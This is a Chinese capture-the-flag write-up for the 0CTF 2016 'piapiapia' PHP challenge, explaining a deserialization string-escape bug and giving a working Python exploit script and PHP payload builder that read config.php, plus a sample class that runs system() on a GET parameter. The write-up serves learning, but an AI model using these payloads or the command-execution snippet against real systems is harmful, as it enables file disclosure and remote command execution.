[0CTF 2016]piapiapia 脚本和总结

先是信息收集 得到www.zip

再是代码审计 发现漏洞 利用PHP反序列化--字符串逃逸 利用file_get_contents() 函数调用读取config.php

本题没sql注入的原因

1 ilter 函数将 '、\ 替换为 _,破坏了 SQL 注入的关键符号(如闭合单引号)。

2 select、where 等关键词被替换为 hacker,进一步阻断注入逻辑。

3 注册和登录逻辑中,用户输入均通过 filter 函数处理后再拼接 SQL,例如:

username = mysql->filter($_POST'username');

sql = "SELECT \* FROM users WHERE username='username'";

无法文件上传的原因

1文件类型强制为 image/jpeg(MIME 类型)。

2文件名被 MD5 哈希后保存为 .jpg,无法保留原始扩展名(如 .php)。

3即使绕过前端校验上传 PHP 文件,服务器也会强制重命名为 .jpg,无法解析执行。

何时存在反序列化漏洞(漏洞原因)

1.直接反序列化用户输入

profile = _POST'data'; // 直接接收用户输入

data = unserialize(profile); // 未验证来源和内容

风险:攻击者可提交任意序列化字符串(如包含恶意类的对象),触发反序列化漏洞

2.缺少签名校验

无哈希签名:序列化后的数据未附加 HMAC 签名,或签名未与服务端密钥验证

3未限制允许的类

// 未设置 allowed_classes,允许任意类被反序列化

data = unserialize(profile);

风险:攻击者可构造包含 __destruct() 或 __wakeup() 魔术方法的恶意类对象,触发任意代码执行。

4.未过滤敏感魔术方法

若反序列化的类包含以下方法且未做安全处理:

class Malicious {

public function __wakeup() {

system($_GET'cmd'); // 危险操作

}

}

风险:反序列化时会自动执行这些方法,导致漏洞利用。

同时今天尝试自己写脚本

python 复制代码
import requests
import re   
import base64
session = requests.Session()
url=''

import os
script_dir = os.path.dirname(os.path.abspath(__file__))
img_path = os.path.join(script_dir, "a.png")

#注册新用户
data={'username':'1234567','password':'123456'}
res=requests.post(url+'register.php',data=data)
a1='Register OK!<a href="index.php">Please Login</a>'
if res.text==a1:
    print('注册成功')
else:
    print('注册失败')
#登录
login_data = {'username': '1234567', 'password': '123456'}
res = session.post(url + 'index.php', data=login_data)

#上传反序列文件
hacker='wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}'
data={
    "phone": "17732930443",
    "email": "1597952666@qq.com",
    "nickname[]": hacker
}

files={
    "photo": ("a.png", open(img_path, "rb"), "image/png")}

res=session.post(url+'update.php',data=data,files=files)
print(res.text)

res=session.get(url+'profile.php')
print(res.text)

data='data:image/gif;base64,(.*?)"'
b=re.findall(data,res.text)
print(base64.b64decode(b[0]))

同级文件夹下有个命名为a.png图片

序列化得到

php 复制代码
<?php
$payload  = 'wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere';
$payload .= '";}s:5:"photo";s:10:"config.php";}';
$_POST['phone']    = '12345678901';
$_POST['email']    = '123@qq.com';
$_POST['nickname'] = array($payload); 
$_FILES['photo']   = array('name' => 'test.png');
$profile = array(
    'phone'    => $_POST['phone'],
    'email'    => $_POST['email'],
    'nickname'  => $_POST['nickname'], 
    'photo'    => 'upload/' . md5($_FILES['photo']['name'])
);
$serialized = serialize($profile);
echo "========== 序列化 (" . strlen($serialized) . " 字符) ==========\n";
echo $serialized . "\n\n";
?>

写这文章的目的是减少对agent的依赖

但感觉agent太上瘾了qwq

相关推荐
JS_SWKJ19 小时前
【无标题】
网络安全
学逆向的21 小时前
汇编——修改EIP的值
开发语言·汇编·网络安全
leagsoft_10031 天前
从“策略看不清”到“风险可收敛”:某高端精密制造企业的网络安全策略治理实践
网络·web安全·制造
零零信安1 天前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
白帽小阳2 天前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
白帽小阳2 天前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
HackTwoHub2 天前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Eastmount2 天前
[论文阅读] (51)ESWA25 基于启发式优化器的入侵检测系统
论文阅读·网络安全·sci·入侵检测·eswa
白帽小阳2 天前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
Sagittarius_A*2 天前
Web 渗透信息收集实战:站点指纹识别与目录扫描
网络安全·渗透测试·kali